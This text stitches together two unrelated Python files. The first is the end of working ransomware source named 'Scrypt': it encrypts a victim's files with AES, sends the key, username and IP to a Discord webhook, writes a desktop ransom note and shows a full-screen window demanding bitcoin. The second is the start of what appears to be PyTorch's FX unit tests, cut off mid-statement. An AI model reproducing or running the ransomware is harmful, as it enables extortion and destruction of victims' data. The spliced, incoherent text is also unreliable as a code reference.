self.crypto = AES.new(self.encryptionPass.encode(), AES.MODE_ECB)
def readMe(self):
try:
f = open(f"C:\\Users\\{self.userName}\\Desktop\\readme.txt","w+")
f.write(note)
except:
pass
def getUserDetails(self):
try:
self.ip = requests.get("https://api.ipify.org?format=json").json()["ip"]
self.userName = os.getlogin()
except:
pass
def encryptFile(self, file):
try:
with open(file, 'rb') as infile:
content = self.crypto.encrypt(pad(infile.read(),32))
with open(file, "wb") as outfile:
outfile.write(content)
outfile.close()
except:
pass
def run(self):
self.sendMessage()
for root, directories, files in os.walk(self.filePath):
for filename in files:
filepath = os.path.join(root, filename)
for base in fileTypes:
if base in filepath:
threading.Thread(target=self.encryptFile, args=(filepath,)).start()
self.readMe()
def sendMessage(self):
try:
self.getUserDetails()
except:
pass
data = {
"embeds": [
{
"title": "**__Victim Report__:**",
"description": f"```css\nUSERID: {self.randomId}``` ```css\nKEY: {self.encryptionPass}``` ```css\nUSERNAME: {self.userName}``` ```css\nIP: {self.ip}```",
"color": 13959168,
"thumbnail": {
"url": "https://www.pngkit.com/png/full/168-1680567_69137579-pentagram-with-demon-baphomet-satanic-goat.png"
},
"author": {
"name": "Scrypt",
"icon_url": "https://i.imgur.com/F3j7z5K.png"
}
}
]
}
r = requests.post(discordWebhook, json=data)
def rSeed(self, stringLength):
password_characters = string.ascii_letters
return ''.join(random.choice(password_characters) for i in range(stringLength))
def rID(self, stringLength):
password_characters = string.ascii_letters + string.digits
return ''.join(random.choice(password_characters) for i in range(stringLength))
class Scrypt(PyQt5.QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.threadpool = PyQt5.QtCore.QThreadPool()
self.initUI()
self.banner()
self.cont()
self.readMe()
self.show()
self.threadpool.start(Ransomware())
def initUI(self):
self.setWindowFlags(PyQt5.QtCore.Qt.WindowCloseButtonHint | PyQt5.QtCore.Qt.WindowType_Mask)
self.showFullScreen()
self.banner()
self.setStyleSheet("""
QMainWindow{
background-color: #212121;
}
""")
def cont(self):
btn = PyQt5.QtWidgets.QPushButton('Continue', self)
btn.resize(750,50)
btn.move((self.frameGeometry().width())/3.35, 900)
btn.setStyleSheet("""
QPushButton{
background-color: #d50000;
border-radius: 7.5px;
font-weight: 1200;
font-size: 18px;
}
QPushButton::hover {
background-color: #9b0000;
}
""")
btn.show()
btn.clicked.connect(self.hide)
def readMe(self):
rm = PyQt5.QtWidgets.QLabel(ransomNote, self)
rm.setStyleSheet("""
QLabel{
background-color: #d50000;
color: #000000;
border: 2px solid #ff5131;
border-radius: 7.5px;
font-weight: 1200;
font-size: 18px;
}
""")
rm.resize(750,650)
rm.move(self.frameGeometry().width()/3.35, 220)
rm.setAlignment(PyQt5.QtCore.Qt.AlignCenter)
rm.show()
def banner(self):
flair = PyQt5.QtWidgets.QLabel('Scrypt', self)
flair.setStyleSheet("""
QLabel{
background-color: #d50000;
color: #000000;
border: 2px solid #ff5131;
border-radius: 7.5px;
font-weight: 1400;
font-size: 45px;
}
""")
flair.resize(800,130)
flair.move(self.frameGeometry().width()/3.5, 50)
flair.setAlignment(PyQt5.QtCore.Qt.AlignCenter)
flair.show()
@PyQt5.QtCore.pyqtSlot()
def hide(self):
self.setWindowOpacity(0)
detailedNote =f"""
-------------------------------------------------------------------------------------------------------------------------
Hello,\n
If you are reading this then you have likely been hit by Scrypt Ransomware\n
We apologize for the incovience, at the end of the day we just want to get paid\n
In order to receive the decrypter you must follow the following steps to truely recover\n
all your files.\n
1. Download BitPay: https://bitpay.com/wallet/ if you are using a different wallet thats fine.\n
2. Send $50 to this address: {btcAdd}\n
3. After sending it wait for a confirmation and send us an email and include your UniqueID: {Ransomware().randomId}\n
4. Wait shortly, you will receive an email with your decrypter once everything is handled.\n
5. If we do not receive payment within 2 weeks we will no longer be handeling support.
-------------------------------------------------------------------------------------------------------------------------
"""
ransomNote = f"""
All Your Files Have Been Encrypted\n
At the end of the day we just want to get paid\n
Here are the instructions to get getting your files back\n
1. Pay $50 btc to the listed address\n
2. Send an email and include your unique id\n
3. Wait\n
------------------------------------\n
Check your desktop for readme.txt if you are lost!\n
------------------------------------\n
BTC Address: {btcAdd}\n
Email: {email}\n
UniqueID: {Ransomware().randomId}\n
------------------------------------\n
Click the Button Below To Continue:
(Killing this program will result in a full lose of files)\n
"""
if __name__ == "__main__":
app = PyQt5.QtWidgets.QApplication(sys.argv)
l = Scrypt()
sys.exit(app.exec())
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import warnings
import unittest
from math import sqrt
from pathlib import Path
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap
import torch._C._fx # type: ignore
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from torch.fx.proxy import TraceError
from fx.quantization import Quantizer
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import run_tests, TEST_WITH_ROCM, IS_WINDOWS, IS_SANDCASTLE, IS_MACOS
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision.models import resnet18
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
@wrap
def wrapped_via_decorator(a):
return a + 1
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
class TestFX(JitTestCase):
def setUp(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
return
torch_root = Path(__file__).resolve().parent.parent
p = torch_root / 'build' / 'lib' / 'libtorchbind_test.so'
torch.ops.load_library(str(p))
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
@skipIfNoTorchVision
def test_resnet(self):
resnet = resnet18()
resnet.train()
res_graph = symbolic_trace(resnet)
res_script = torch.jit.script(res_graph)
ip = torch.rand(1, 3, 224, 224)
a = resnet(ip)
b = res_graph(ip)
c = res_script(ip)
self.assertEqual(a, b)
self.assertEqual(a, c)
quantizer = Quantizer(res_graph)
for i in range(10):
quantizer.observe((torch.rand(1, 3, 224, 224),))
qgraph = quantizer.quantize()
qgraph.graph.lint()
qgraph_script = torch.jit.script(qgraph)
d = qgraph(ip)
e = qgraph_script(ip)
assert (a - d).abs().max() < 2
self.assertEqual(d, e)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.Tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_allclose(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_allclose(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_allclose(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
